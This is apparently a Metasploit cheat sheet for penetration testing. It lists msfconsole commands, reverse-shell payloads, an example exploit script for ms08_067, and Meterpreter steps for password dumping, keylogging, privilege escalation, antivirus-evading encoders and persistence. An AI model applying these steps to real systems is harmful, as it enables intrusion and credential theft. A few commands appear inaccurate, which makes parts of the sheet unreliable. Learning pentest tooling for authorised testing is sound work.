Metasploit is an advanced, open-source framework primarily used for developing, testing, and executing exploit code against remote targets. Originally developed by H.D. Moore, it’s now maintained by Rapid7 and is widely regarded as one of the most powerful and popular penetration testing tools in cybersecurity.
- What is Metasploit?
- Key Use Cases
- Metasploit Framework Cheat Sheet
- Basic Commands
- Metasploit Architecture
- Module Types Overview
- Scanning and Enumeration
- Exploiting Vulnerabilities
- Payloads
- Meterpreter Post-Exploitation Commands
- Auxiliary Modules for Scanning and Enumeration
- Encoders and Evasion
- Post-Exploitation Modules
- Exploit Database and CVE Integration
- Database and Workspace Management
- Scripting and Automation
- Maintaining Persistence
- Useful External Tools
Metasploit is an exploit development and execution platform for identifying, attacking, and defending against network vulnerabilities. It is highly modular, enabling the seamless integration of exploits, payloads, encoders, and auxiliary modules, which combine to deliver powerful attack and defense capabilities.
Metasploit is commonly used for:
- Vulnerability Assessment: Scanning for network, system, and application vulnerabilities.
- Exploitation: Executing and testing exploit payloads against known vulnerabilities.
- Post-Exploitation: Performing actions like privilege escalation, persistence, and data gathering after a successful exploit.
- Red Team Operations: Simulating real-world attack vectors to test defense mechanisms.
- Security Research and Training: Learning about and experimenting with new exploits in a controlled lab environment.
- Starting Metasploit Console (msfconsole):
msfconsole
- Search for Modules:
search <keyword>
- Use a Module:
use <module_path>
- Display Module Info:
info <module>
- Display All Options for a Module:
show options
- Setting Options for Modules:
set <option_name> <value>
- Show Payloads for Exploit:
show payloads
- Show All Auxiliary Modules:
show auxiliary
- Run Module:
run
- Execute Exploit:
exploit
- Background Current Session:
background
- Display Active Sessions:
sessions -l
- Connect to Session:
sessions -i <session_id>
- Key Components:
- Modules: Reusable units like exploits, payloads, encoders, and nops.
- Exploits: Code that takes advantage of vulnerabilities.
- Payloads: Code executed on a target after exploiting.
- Encoders: Hide the payload in encoded form to evade detection.
- Auxiliary: Non-exploit functions like scanning and fuzzing.
- Post: Actions after exploitation, such as privilege escalation.
- Exploit Modules:
use exploit/<platform>/<name>
- Payload Modules:
set PAYLOAD <payload>
- Auxiliary Modules:
use auxiliary/<module>
- Post Exploitation Modules:
use post/<module>
- Encoder Modules:
use encoder/<encoder>
- NOP Modules:
use nop/<nop>
- Port Scanning (TCP):
use auxiliary/scanner/portscan/tcp set RHOSTS <target> run
- Service Version Scanning:
use auxiliary/scanner/portscan/version set RHOSTS <target> run
- SMB Enumeration:
use auxiliary/scanner/smb/smb_version set RHOSTS <target> run
- FTP Service Enumeration:
use auxiliary/scanner/ftp/ftp_version set RHOSTS <target> run
- Identify and Load Exploit:
search <vulnerability or CVE-ID> use exploit/<platform>/<vulnerability>
- Set Required Options (like RHOST, LHOST):
set RHOST <target> set LHOST <your_ip> set PAYLOAD <payload>
- Execute Exploit:
exploit
-
Types of Payloads:
- Singles: Self-contained; only one stage.
- Stagers: Load larger payloads (stages).
- Stages: Executed by stagers to maintain stealth.
-
Common Payloads:
- Reverse Shells:
windows/meterpreter/reverse_tcp linux/x86/meterpreter/reverse_tcp
- Bind Shells:
windows/shell_bind_tcp linux/x86/shell_bind_tcp
- Meterpreter: Advanced payload with extensive post-exploitation capabilities.
windows/meterpreter/reverse_https linux/x64/meterpreter/reverse_tcp
- Reverse Shells:
- System Info:
sysinfo
- List Processes:
ps
- File Upload/Download:
upload <local_path> <remote_path> download <remote_path> <local_path>
- Privilege Escalation:
getsystem
- Password Dumping:
hashdump
- Keylogging:
keyscan_start keyscan_stop keyscan_dump
- Session Migration (to stay persistent):
migrate <pid>
- Scanning:
- Portscan (TCP):
use auxiliary/scanner/portscan/tcp
- SMB Scan:
use auxiliary/scanner/smb/smb_version
- FTP Version Scan:
use auxiliary/scanner/ftp/ftp_version
- HTTP Banner Grabber:
use auxiliary/scanner/http/http_version
- Portscan (TCP):
- Encode Payload:
use encoder/x86/shikata_ga_nai
- Setting Encoder Options:
set ENCODER <encoder_type>
- Setting Encoder Options:
- Check Payload Validity:
check
- Gather System Information:
use post/windows/gather/hashdump run
- Gather Network Configuration:
use post/multi/gather/network_config run
- Extract Password Hashes:
use post/windows/gather/hashdump run
- Search for CVEs and Load Exploits:
search cve:<CVE-ID>
- NVD Data Integration for CVE Info:
vulndb <CVE-ID>
-
Initialize Database:
db_init
-
List Workspaces:
workspace -l
-
Create New Workspace:
workspace -a <name>
-
Switch Workspace:
workspace <name>
-
Delete Workspace:
workspace -d <name>
- Run Custom Scripts (.rc files):
msfconsole -r <script.rc>
- Example RC Script:
use exploit/windows/smb/ms08_067_netapi set PAYLOAD windows/meterpreter/reverse_tcp set RHOST <target> set LHOST <your_ip> exploit
- Persistent Backdoor Payload:
windows/meterpreter/reverse_tcp
- Execute a Script on Login:
use post/windows/manage/persistence set SESSION <session_id>
- Nmap Integration:
db_nmap -sV <target>
- Armitage: GUI front-end for Metasploit.
- Nessus Integration:
db_import <nessus_scan_file>